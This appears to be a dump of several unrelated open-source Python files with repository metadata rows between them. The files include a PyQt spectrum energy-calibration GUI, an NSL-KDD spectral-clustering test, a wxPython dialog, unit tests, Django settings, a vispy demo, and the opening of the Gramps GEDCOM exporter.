self._ezeroSpinBox = MarkerSpinBox(self, self._plotSpectraWindow, r'$E=0$')
self._ezeroSpinBox.setMaximumWidth(100)
self._ezeroSpinBox.setMinimumWidth(70)
self._ezeroSpinBox.setAlignment(qt.Qt.AlignRight)
self._ezeroSpinBox.setMinimum(-100000)
self._ezeroSpinBox.setMaximum(100000)
self._ezeroSpinBox.setDecimals(3)
self._ezeroSpinBox.setSingleStep(1)
self._ezeroSpinBox.setValue(0)
ezeroLayout = qt.QHBoxLayout()
ezeroLayout.addWidget(qt.QLabel('zero energy pixel'))
ezeroLayout.addWidget(qt.HorizontalSpacer())
ezeroLayout.addWidget(self._ezeroSpinBox)
ezeroWidget = qt.QWidget()
ezeroWidget.setLayout(ezeroLayout)
self._markersPositioned = False
calibrationLayout.addWidget(ecalibWidget)
calibrationLayout.addWidget(ezeroWidget)
calibrationWidget.setLayout(calibrationLayout)
self.showGaussianCheckBox = qt.QCheckBox('Show Gaussian at zero energy')
self.GaussianWidthSpinBox = qt.QDoubleSpinBox()
self.GaussianWidthSpinBox.setMaximumWidth(100)
self.GaussianWidthSpinBox.setMinimumWidth(70)
self.GaussianWidthSpinBox.setAlignment(qt.Qt.AlignRight)
self.GaussianWidthSpinBox.setMinimum(0.001)
self.GaussianWidthSpinBox.setMaximum(10000000)
self.GaussianWidthSpinBox.setDecimals(3)
self.GaussianWidthSpinBox.setSingleStep(1)
self.GaussianWidthSpinBox.setValue(1)
self.GaussianWidthSpinBox.setEnabled(False)
GaussianWidthLayout = qt.QHBoxLayout()
GaussianWidthLayout.addWidget(qt.QLabel('FWHM'))
GaussianWidthLayout.addSpacing(10)
GaussianWidthLayout.addWidget(self.GaussianWidthSpinBox)
gaussianWidthWidget = qt.QWidget()
gaussianWidthWidget.setLayout(GaussianWidthLayout)
self.GaussianHeightSpinBox = qt.QDoubleSpinBox()
self.GaussianHeightSpinBox.setMaximumWidth(100)
self.GaussianHeightSpinBox.setMinimumWidth(70)
self.GaussianHeightSpinBox.setAlignment(qt.Qt.AlignRight)
self.GaussianHeightSpinBox.setMinimum(0.001)
self.GaussianHeightSpinBox.setMaximum(10000000)
self.GaussianHeightSpinBox.setDecimals(3)
self.GaussianHeightSpinBox.setSingleStep(1)
self.GaussianHeightSpinBox.setValue(5)
self.GaussianHeightSpinBox.setEnabled(False)
GaussianHeightLayout = qt.QHBoxLayout()
GaussianHeightLayout.addWidget(qt.QLabel('height'))
GaussianHeightLayout.addSpacing(10)
GaussianHeightLayout.addWidget(self.GaussianHeightSpinBox)
gaussianHeightWidget = qt.QWidget()
gaussianHeightWidget.setLayout(GaussianHeightLayout)
self.GaussianHeightSpinBox.setDisabled(True)
self.autoscaleGaussianCheckBox = qt.QCheckBox('Autoscale height')
self.autoscaleGaussianCheckBox.setChecked(True)
gaussianLayout = qt.QGridLayout()
gaussianLayout.addWidget(self.showGaussianCheckBox, 0, 0, 1, 2)
gaussianLayout.addWidget(gaussianWidthWidget, 1, 0, 1, 1)
gaussianLayout.addWidget(gaussianHeightWidget, 1, 2, 1, 1)
gaussianLayout.addWidget(self.autoscaleGaussianCheckBox, 1, 3, 1, 1)
gaussianWidget = qt.QWidget()
gaussianWidget.setLayout(gaussianLayout)
self.calibrateButton = qt.QPushButton('Convert')
self.calibrateButton.setMinimumSize(75,75)
self.calibrateButton.setMaximumSize(75,75)
self.calibrateButton.clicked.connect(self.calibrateButtonClicked)
self.saveButton = qt.QPushButton('Save')
self.saveButton.setMinimumSize(75,75)
self.saveButton.setMaximumSize(75,75)
self.saveButton.clicked.connect(self.saveButtonClicked)
self.saveButton.setDisabled(True)
self.saveButton.setToolTip('Select output file\nto enable saving')
self._inputLayout = qt.QHBoxLayout(self)
self._inputLayout.addWidget(calibrationWidget)
self._inputLayout.addWidget(gaussianWidget)
self._inputLayout.addWidget(qt.HorizontalSpacer())
self._inputLayout.addWidget(self.calibrateButton)
self._inputLayout.addWidget(self.saveButton)
self._inputWidget = qt.QWidget()
self._inputWidget.setLayout(self._inputLayout)
self._rsLayout = qt.QVBoxLayout(self)
self._rsLayout.addWidget(self._inputWidget)
self._rsLayout.addWidget(self._plotSpectraWindow)
self._rsWidget = qt.QWidget()
self._rsWidget.setContentsMargins(0,0,0,-8)
self._rsWidget.setLayout(self._rsLayout)
self._lsLayout = qt.QVBoxLayout(self)
self._lsLayout.addWidget(self._sourceWidget)
self._lsLayout.addWidget(self._exportWidget)
self._lsWidget = qt.QWidget()
self._lsWidget.setContentsMargins(0,0,0,-8)
self._lsWidget.setSizePolicy(
qt.QSizePolicy(qt.QSizePolicy.Fixed, qt.QSizePolicy.Preferred))
self._lsWidget.setLayout(self._lsLayout)
self._lsWidget.setMaximumWidth(500)
self.splitter = qt.QSplitter(self)
self.splitter.setOrientation(qt.Qt.Horizontal)
self.splitter.setHandleWidth(5)
self.splitter.setStretchFactor(1, 2)
self.splitter.addWidget(self._lsWidget)
self.splitter.addWidget(self._rsWidget)
self._mainLayout = qt.QHBoxLayout()
self._mainLayout.addWidget(self.splitter)
self.setLayout(self._mainLayout)
return 0
def connect_signals(self):
self._sourceWidget.sigAddSelection.connect(
self._plotSpectraWindow._addSelection)
self._sourceWidget.sigRemoveSelection.connect(
self._plotSpectraWindow._removeSelection)
self._sourceWidget.sigReplaceSelection.connect(
self._plotSpectraWindow._replaceSelection)
self.autoscaleGaussianCheckBox.stateChanged.connect(
self.autoscaleGaussianChanged)
self._sourceWidget.sigAddSelection.connect(self._positionMarkers)
self._sourceWidget.sigAddSelection.connect(self._selectionchanged)
self._sourceWidget.sigReplaceSelection.connect(self._selectionchanged)
self._exportWidget.OutputFileSelected.connect(self._enableSaveButton)
self.showGaussianCheckBox.stateChanged.connect(self.gaussianOnOff)
self._ezeroSpinBox.intersectionsChangedSignal.connect(self.zeroEnergyChanged)
self._ezeroSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True))
self.GaussianWidthSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True))
self.GaussianHeightSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True))
self._sourceWidget.sigReplaceSelection.connect(lambda: self.zeroEnergyChanged(replot=True))
return 0
def zeroEnergyChanged(self, replot=False):
if self.showGaussianCheckBox.isChecked():
ezero = self._ezeroSpinBox.value()
gwidth = self.GaussianWidthSpinBox.value()
gheight = self.GaussianHeightSpinBox.value()
if self.autoscaleGaussianCheckBox.isChecked():
curves = [c for c in
self._plotSpectraWindow.getAllCurves(just_legend=True)
if not c.startswith('Gaussian')]
if len(curves):
x, y = self._plotSpectraWindow.getCurve(curves[0])[:2]
gheight = y[np.abs(x - ezero).argsort()][:5].mean()
self.GaussianHeightSpinBox.setValue(gheight)
gaussianX = np.linspace(ezero-3*gwidth, ezero+3*gwidth, 100)
gaussianY = gheight * np.exp(-(gaussianX-ezero)**2/(2*(gwidth/2.3548)**2))
self._plotSpectraWindow.addCurve(
gaussianX, gaussianY, 'Gaussian', ylabel=' ', replot=replot)
def gaussianOnOff(self):
if self.showGaussianCheckBox.isChecked():
self.GaussianWidthSpinBox.setEnabled(True)
if not self.autoscaleGaussianCheckBox.isChecked():
self.GaussianHeightSpinBox.setEnabled(True)
self.autoscaleGaussianCheckBox.setEnabled(True)
self.zeroEnergyChanged(replot=True)
else:
self.GaussianWidthSpinBox.setEnabled(False)
self.GaussianHeightSpinBox.setEnabled(False)
self.autoscaleGaussianCheckBox.setEnabled(False)
self._plotSpectraWindow.removeCurve('Gaussian ')
def autoscaleGaussianChanged(self):
if self.autoscaleGaussianCheckBox.isChecked():
self.GaussianHeightSpinBox.setEnabled(False)
else:
self.GaussianHeightSpinBox.setEnabled(True)
def _enableSaveButton(self):
self.saveButton.setEnabled(True)
self.saveButton.setToolTip(None)
def _positionMarkers(self):
if not self._markersPositioned:
limits = self._plotSpectraWindow.getGraphXLimits()
self._ezeroSpinBox.setValue(0.5 * (limits[1]+limits[0]))
self._markersPositioned = True
def _selectionchanged(self):
self.scansCalibrated = False
self.calibrateButton.setEnabled(True)
def calibrateButtonClicked(self):
llist = self._plotSpectraWindow.getAllCurves()
# Align scans
self.calibratedScans = []
oldlegends = []
sourcenames = [s.sourceName for s in self._sourceWidget.sourceList]
for i, scan in enumerate(llist):
x, y, legend, scaninfo = scan[:4]
if 'SourceName' not in scaninfo or legend.rstrip().endswith('ENE') \
or legend=='Gaussian ':
continue
sourceindex = sourcenames.index(scaninfo['SourceName'])
dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(scaninfo['Key'])
newdataObject = copy.deepcopy(dataObject)
xindex = scaninfo['selection']['x'][0]
yindex = scaninfo['selection']['y'][0]
newx = x - self._ezeroSpinBox.value()
newx *= self._ecalibSpinBox.value() * 1e-3
oldlegends.append(legend)
newlegend = ''.join([legend, ' ENE'])
scaninfo['Ezero'] = self._ezeroSpinBox.value()
scaninfo['Ecalib'] = self._ecalibSpinBox.value()
scaninfo['oldKey'] = newdataObject.info['Key']
scaninfo['oldX'] = scaninfo['selection']['cntlist'][
scaninfo['selection']['x'][0]]
self._plotSpectraWindow.addCurve(
newx, y, newlegend, scaninfo,
xlabel='Energy',
ylabel='',
replot=False)
self._plotSpectraWindow.setGraphXLabel('Energy')
self._plotSpectraWindow.removeCurves(oldlegends)
self._plotSpectraWindow.resetZoom()
self.scansCalibrated = True
self.calibrateButton.setDisabled(True)
if not self._exportWidget._folderLineEdit.text() == '':
self.saveButton.setEnabled(True)
return
def saveButtonClicked(self):
curves = self._plotSpectraWindow.getAllCurves()
dataObjects2save = []
sourcenames = [s.sourceName[0] for s in self._sourceWidget.sourceList]
for curve in curves:
if not legend.rstrip().endswith('ENE'):
continue
sourceindex = sourcenames.index(info['FileName'])
dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(info['oldKey'])
newdataObject = copy.deepcopy(dataObject)
xindex = newdataObject.info['LabelNames'].index(info['oldX'])
escale = newdataObject.data[:, xindex] - self._ezeroSpinBox.value()
escale *= self._ecalibSpinBox.value() * 1e-3
if newdataObject.info['LabelNames'].count('Energy') > 0:
ene_index = newdataObject.info['LabelNames'].index('Energy')
newdataObject.data = np.vstack(
[newdataObject.data[:,:ene_index].T, escale, newdataObject.data[:, ene_index+1:].T]).T
else:
newdataObject.data = np.vstack(
[newdataObject.data[:,0], escale, newdataObject.data[:, 1:].T]).T
newdataObject.info['LabelNames'] = newdataObject.info['LabelNames'][:1] + \
['Energy'] + newdataObject.info['LabelNames'][1:]
newdataObject.info['Command'] = '%s - energy calibrated' % (
info['Command'])
header = []
header.append('#D %s\n' % time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(time.time())))
for hline in newdataObject.info['Header']:
if hline.startswith('#D'):
continue
if hline.startswith('#N'):
continue
if hline.startswith('#L'):
continue
header.append(hline)
header.append('#C Parameters for energy calibration')
header.append('#C Ezero: %s %s' % (info['Ezero'], info['oldX']))
header.append('#C Ecalib: %s meV / %s' % (info['Ecalib'], info['oldX']))
header.append('#C ')
header.append('#N %d' % (len(newdataObject.info['LabelNames'])))
header.append('#L %s' % (' '.join(newdataObject.info['LabelNames'])))
newdataObject.info['Header'] = header
dataObjects2save.append(newdataObject)
specfilename = self._exportWidget.outputFile
if not os.path.isfile(specfilename):
with open('%s' % (specfilename), 'wb+') as f:
fileheader = '#F %s\n\n' % (specfilename)
f.write(fileheader.encode('ascii'))
scannumber = 1
else:
keys = SpecFileDataSource(specfilename).getSourceInfo()['KeyList']
scans = [int(k.split('.')[0]) for k in keys]
scannumber = max(scans) + 1
for dataObject in dataObjects2save:
output = []
command = dataObject.info['Command']
if self._exportWidget.askForScanName():
command = self._exportWidget.getScanName(command)
if not command:
command = dataObject.info['Command']
output.append('#S %d %s\n' % (scannumber, command))
header = dataObject.info['Header']
for item in header:
if item.startswith('#S'):
continue
output.append(''.join([item, '\n']))
output.append(''.join('%s\n' % (' '.join([str(si) for si in s]))
for s in dataObject.data.tolist()))
output.append('\n')
with open('%s' % (specfilename), 'ab+') as f:
f.write(''.join(output).encode('ascii'))
print('Spectrum saved to \"%s\"' % (specfilename))
key = SpecFileDataSource(specfilename).getSourceInfo()['KeyList'][-1]
if self._exportWidget._datCheckBox.isChecked():
command = command.replace(':','_').replace(' ', '_')
if not os.path.isdir(specfilename.rstrip('.spec')):
os.mkdir(specfilename.rstrip('.spec'))
datfilename = '%s/S%04d_%s_%s.dat' % (
specfilename.rstrip('.spec'), scannumber,
key.split('.')[-1], command)
np.savetxt('%s' % (datfilename), dataObject.data)
print('Spectrum saved to \"%s\"\n' % (datfilename))
#~ scannumber +=1
self.saveButton.setDisabled(True)
if __name__ == "__main__":
import numpy as np
app = qt.QApplication([])
app.lastWindowClosed.connect(app.quit)
w = MainWindow()
w.show()
app.exec_()
| mit | -7,016,220,558,226,067,000 | 40.281188 | 106 | 0.598258 | false |
zedoul/AnomalyDetection | test_discretization/test_scikit_sc.py | 1 | 3101 | # -*- coding: utf-8 -*-
"""
http://www.astroml.org/sklearn_tutorial/dimensionality_reduction.html
"""
print (__doc__)
import numpy as np
import copy
from sklearn.cluster import KMeans
from sklearn.cluster import k_means
from sklearn.manifold import spectral_embedding
from sklearn.utils import check_random_state
import nslkdd.preprocessing as preprocessing
import sugarbee.reduction as reduction
import sugarbee.distance as distance
import sugarbee.affinity as affinity
import sugarbee.solver as solver
import scipy.sparse as sparse
import scipy.sparse.csgraph as csgraph
#def assign_undirected_weight(W, i, j, v):
# W[i,j] = W[j,i] = v
if __name__ == '__main__':
import time
start = time.time()
datasize = 1000
print "preprocessing data..."
df, headers = preprocessing.get_preprocessed_data(datasize)
df_train = copy.deepcopy(df)
df_train.drop('attack',1,inplace=True)
df_train.drop('difficulty',1,inplace=True)
print "normal"
print len(df[df["attack"] == 11])
print "abnormal"
print len(df[df["attack"] != 11])
print "data reduction..."
proj = reduction.reduction(df_train, n_components=1)
print "graph generation..."
A = affinity.get_affinity_matrix(proj, metric_method=distance.gaussian,knn=200)
# A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='euclidean', knn=8)
# A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='manhattan', knn=8)
# A = affinity.get_affinity_matrix(proj, metric_method=distance.cosdist,knn=8)
D = affinity.get_degree_matrix(A)
L = affinity.get_laplacian_matrix(A,D)
print "data clustering..."
Abin = None
if sparse.isspmatrix(L):
Abin = sparse.csc_matrix(L).sign()
else:
Abin = np.sign(L)
numConn, connMap = csgraph.connected_components(Abin, directed = False)
numClusters = numConn
spectral = cluster.SpectralClustering(n_clusters = numClusters,
affinity = "precomputed")
y_spectral = spectral.fit_predict(A)
res = y_spectral
print "analyzing result..."
t = df["attack"].values.tolist()
f = df["difficulty"].values.tolist()
print res[:10]
print t[:10]
print f[:10]
# t : 11, normal
# t : otherwise abnormal
true_positive = 0
true_negative = 0
false_positive = 0
false_negative = 0
trueclass = 0
for i in range(datasize):
if t[i] == 11 and res[i] == trueclass:
true_positive = true_positive + 1
if t[i] != 11 and res[i] == trueclass:
false_positive = false_positive + 1
if t[i] != 11 and res[i] != trueclass:
true_negative = true_negative + 1
if t[i] == 11 and res[i] != trueclass:
false_negative = false_negative + 1
print true_positive
print true_negative
print false_positive
print false_negative
elapsed = (time.time() - start)
print "done in %s seconds" % (elapsed)
tttt = 0
for zzz in est.labels_:
if zzz == trueclass :
tttt = tttt + 1
print tttt
| mit | 1,723,285,607,583,526,000 | 28.254717 | 105 | 0.64979 | false |
turdusmerula/kipartman | kipartman/dialogs/dialog_main.py | 1 | 3486 | # -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Dec 18 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
###########################################################################
## Class DialogMain
###########################################################################
class DialogMain ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Kipartman", pos = wx.DefaultPosition, size = wx.Size( 1160,686 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
self.menu_bar = wx.MenuBar( 0 )
self.menu_file = wx.Menu()
self.menu_file_project = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Open project", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_file.Append( self.menu_file_project )
self.menu_file.AppendSeparator()
self.menu_buy_parts = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Buy parts", u"Open the buy parts window", wx.ITEM_NORMAL )
self.menu_file.Append( self.menu_buy_parts )
self.menu_bar.Append( self.menu_file, u"File" )
self.menu_view = wx.Menu()
self.menu_view_configuration = wx.MenuItem( self.menu_view, wx.ID_ANY, u"Configuration", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_view.Append( self.menu_view_configuration )
self.menu_bar.Append( self.menu_view, u"View" )
self.menu_help = wx.Menu()
self.menu_about = wx.MenuItem( self.menu_help, wx.ID_ANY, u"About", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_help.Append( self.menu_about )
self.menu_bar.Append( self.menu_help, u"Help" )
self.SetMenuBar( self.menu_bar )
bSizer5 = wx.BoxSizer( wx.VERTICAL )
self.info = wx.InfoBar( self )
self.info.SetShowHideEffects( wx.SHOW_EFFECT_NONE, wx.SHOW_EFFECT_NONE )
self.info.SetEffectDuration( 500 )
bSizer5.Add( self.info, 0, wx.ALL|wx.EXPAND, 5 )
self.notebook = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
bSizer5.Add( self.notebook, 1, wx.EXPAND |wx.ALL, 5 )
self.SetSizer( bSizer5 )
self.Layout()
self.status = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_KILL_FOCUS, self.onKillFocus )
self.Bind( wx.EVT_MENU, self.onMenuFileProjetSelection, id = self.menu_file_project.GetId() )
self.Bind( wx.EVT_MENU, self.onMenuBuyPartsSelection, id = self.menu_buy_parts.GetId() )
self.Bind( wx.EVT_MENU, self.onMenuViewConfigurationSelection, id = self.menu_view_configuration.GetId() )
self.Bind( wx.EVT_MENU, self.onMenuHelpAboutSelection, id = self.menu_about.GetId() )
self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGED, self.onNotebookPageChanged )
self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGING, self.onNotebookPageChanging )
def __del__( self ):
pass
# Virtual event handlers, overide them in your derived class
def onKillFocus( self, event ):
event.Skip()
def onMenuFileProjetSelection( self, event ):
event.Skip()
def onMenuBuyPartsSelection( self, event ):
event.Skip()
def onMenuViewConfigurationSelection( self, event ):
event.Skip()
def onMenuHelpAboutSelection( self, event ):
event.Skip()
def onNotebookPageChanged( self, event ):
event.Skip()
def onNotebookPageChanging( self, event ):
event.Skip()
| gpl-3.0 | -5,311,697,587,579,618,000 | 32.84466 | 177 | 0.647734 | false |
dahiro/shotgun-replica | shotgun_replica/python/tests/shotgun_replica_tests/utilities/test_entityNaming.py | 1 | 3045 | # -*- coding: utf-8 -*-
'''
Created on 21.05.2012
@author: bach
'''
import unittest
from shotgun_replica.utilities import entityNaming
class Test( unittest.TestCase ):
def setUp( self ):
pass
def tearDown( self ):
pass
def testUnderScoreReplacement( self ):
testPairs = [
( "shoot_days", "ShootDays", True ),
( "_shoot_days", "ShootDays", False ),
]
for ( underscored, capitalized, needsInverse ) in testPairs:
replacedCapitalized = entityNaming.replaceUnderscoresWithCapitals( underscored )
self.assertEqual( replacedCapitalized, capitalized )
if needsInverse:
replacedUnderscored = entityNaming.replaceCapitalsWithUnderscores( capitalized )
self.assertEqual( replacedUnderscored, underscored )
def testConnectionEntityName( self ):
testPairs = [
( "Asset", "assets", "AssetAssetConnection" ),
( "Asset", "sg_linked_assets", "Asset_sg_linked_assets_Connection" ),
( "Asset", "sg_linked_shots", "Asset_sg_linked_shots_Connection" ),
( "Asset", "shoot_days", "AssetShootDayConnection" )
]
for ( entityType, attrName, connectionEntityName ) in testPairs:
connEntityNameTesting = entityNaming.getConnectionEntityName( entityType, attrName )
self.assertEqual( connEntityNameTesting, connectionEntityName )
def testConnectionAttrNames( self ):
testPairs = [
( "Asset", "Asset", "AssetAssetConnection", "asset", "parent" ),
( "Asset", "Shot", "AssetShotConnection", "asset", "shot" ),
( "CustomEntity07", "CustomEntity05", "CustomEntity07_sg_sources_Connection", "custom_entity07", "custom_entity05" ),
( "Revision", "Revision", "RevisionRevisionConnection", "source_revision", "dest_revision"),
]
for ( baseEntityType, linkedEntityType, connEntityName, srcAttrName, destAttrName ) in testPairs:
( srcAttrNameTest, destAttrNameTest ) = entityNaming.getConnectionEntityAttrName( baseEntityType,
linkedEntityType,
connEntityName )
self.assertEqual( srcAttrNameTest, srcAttrName )
self.assertEqual( destAttrNameTest, destAttrName )
def testRetAttributeNames( self ):
testPairs = [
( "Asset", "sg_linked_assets", "asset_sg_linked_assets_assets" ),
( "CustomEntity02", "sg_sink_tasks", "custom_entity02_sg_sink_tasks_custom_entity02s" ),
]
for ( entityType, attrName, retAttrName ) in testPairs:
retAttrNameTest = entityNaming.getReverseAttributeName( entityType, attrName )
self.assertEqual( retAttrNameTest, retAttrName )
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| bsd-3-clause | 7,776,669,194,021,604,000 | 41.887324 | 129 | 0.598686 | false |
vodkasoft/CanYouSinkMe | backend/util/encoding.py | 1 | 1632 | # !/usr/bin/env python
# Copyright 2014 Vodkasoft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from json import dumps
def encode_json(data, pretty):
""" Formats an object as JSON
Parameters:
:param data: data the will be encoded
:param pretty: whether the output should be human readable or not
Returns:
:return: data encoded as JSON
"""
if pretty:
return __format_as_pretty_json(data)
else:
return __format_as_compact_json(data)
def __format_as_pretty_json(data):
""" Encodes an object as JSON that is human readable
Parameters:
:param data: data that will be encoded
Returns:
:return: data encoded in a human readable JSON format
"""
return dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
def __format_as_compact_json(data):
""" Encodes an object as JSON with the least amount of characters
Parameters:
:param data: data that will be encoded
Returns:
:return: data encoded in a compact JSON format
"""
return dumps(data, separators=(',', ':'))
| apache-2.0 | 2,793,066,812,018,815,000 | 27.137931 | 74 | 0.669118 | false |
ayazmaroof/Yscrape | yelpsite/yelpsite/settings.py | 1 | 2059 | """
Django settings for yelpsite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'g#o84!cbq0&27c+qw9xl6nakxui40v$ml)ex!-1jvr)!%m+6s7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'yelpsite.urls'
WSGI_APPLICATION = 'yelpsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Singapore'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| mit | 7,521,403,698,506,085,000 | 23.807229 | 71 | 0.728023 | false |
Eric89GXL/vispy | examples/basics/scene/linear_region.py | 2 | 2298 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
Demonstration of InfiniteLine visual.
"""
import sys
import numpy as np
from vispy import app, scene
# vertex positions of data to draw
N = 200
pos = np.zeros((N, 2), dtype=np.float32)
x_lim = [50., 750.]
y_lim = [-2., 2.]
pos[:, 0] = np.linspace(x_lim[0], x_lim[1], N)
pos[:, 1] = np.random.normal(size=N)
# color array
color = np.ones((N, 4), dtype=np.float32)
color[:, 0] = np.linspace(0, 1, N)
color[:, 1] = color[::-1, 0]
canvas = scene.SceneCanvas(keys='interactive', show=True)
grid = canvas.central_widget.add_grid(spacing=0)
viewbox = grid.add_view(row=0, col=1, camera='panzoom')
# add some axes
x_axis = scene.AxisWidget(orientation='bottom')
x_axis.stretch = (1, 0.1)
grid.add_widget(x_axis, row=1, col=1)
x_axis.link_view(viewbox)
y_axis = scene.AxisWidget(orientation='left')
y_axis.stretch = (0.1, 1)
grid.add_widget(y_axis, row=0, col=0)
y_axis.link_view(viewbox)
# add a line plot inside the viewbox
line = scene.Line(pos, color, parent=viewbox.scene)
# add vertical lines
color = np.array([[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0]])
pos = np.array([100, 120, 140, 160, 180, 200], dtype=np.float32)
vert_region1 = scene.LinearRegion(pos, color,
parent=viewbox.scene)
vert_region2 = scene.LinearRegion([549.2, 700], [0.0, 1.0, 0.0, 0.5],
vertical=True,
parent=viewbox.scene)
# add horizontal lines
pos = np.array([0.3, 0.0, -0.1], dtype=np.float32)
hor_region1 = scene.LinearRegion(pos, [1.0, 0.0, 0.0, 0.5],
vertical=False,
parent=viewbox.scene)
hor_region2 = scene.LinearRegion([-5.1, -2.0], [0.0, 0.0, 1.0, 0.5],
vertical=False,
parent=viewbox.scene)
# auto-scale to see the whole line.
viewbox.camera.set_range()
if __name__ == '__main__' and sys.flags.interactive == 0:
app.run()
| bsd-3-clause | 8,837,949,601,075,203,000 | 29.64 | 73 | 0.563098 | false |
jralls/gramps | gramps/plugins/export/exportgedcom.py | 1 | 59838 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2008-2009 Gary Burton
# Copyright (C) 2008 Robert Cheramy <[email protected]>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2010 Nick Hall
# Copyright (C) 2011 Tim G L Lyons
# Copyright (C) 2012 Doug Blank <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"Export to GEDCOM"
#-------------------------------------------------------------------------
#
# Standard Python Modules
#
#-------------------------------------------------------------------------
import os
import time
#-------------------------------------------------------------------------
#
# Gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
from gramps.gen.lib import (AttributeType, ChildRefType, Citation, Date,
EventRoleType, EventType, LdsOrd, NameType,
PlaceType, NoteType, Person, UrlType)
from gramps.version import VERSION
import gramps.plugins.lib.libgedcom as libgedcom
from gramps.gen.errors import DatabaseError
from gramps.gen.updatecallback import UpdateCallback
from gramps.gen.utils.file import media_path_full
from gramps.gen.utils.place import conv_lat_lon
from gramps.gen.utils.location import get_main_location
from gramps.gen.display.place import displayer as _pd
#-------------------------------------------------------------------------
#
# GEDCOM tags representing attributes that may take a parameter, value or
# description on the same line as the tag
#
#-------------------------------------------------------------------------
NEEDS_PARAMETER = set(
["CAST", "DSCR", "EDUC", "IDNO", "NATI", "NCHI",
"NMR", "OCCU", "PROP", "RELI", "SSN", "TITL"])
LDS_ORD_NAME = {
LdsOrd.BAPTISM : 'BAPL',
LdsOrd.ENDOWMENT : 'ENDL',
LdsOrd.SEAL_TO_PARENTS : 'SLGC',
LdsOrd.SEAL_TO_SPOUSE : 'SLGS',
LdsOrd.CONFIRMATION : 'CONL',
}
LDS_STATUS = {
LdsOrd.STATUS_BIC : "BIC",
LdsOrd.STATUS_CANCELED : "CANCELED",
LdsOrd.STATUS_CHILD : "CHILD",
LdsOrd.STATUS_CLEARED : "CLEARED",
LdsOrd.STATUS_COMPLETED : "COMPLETED",
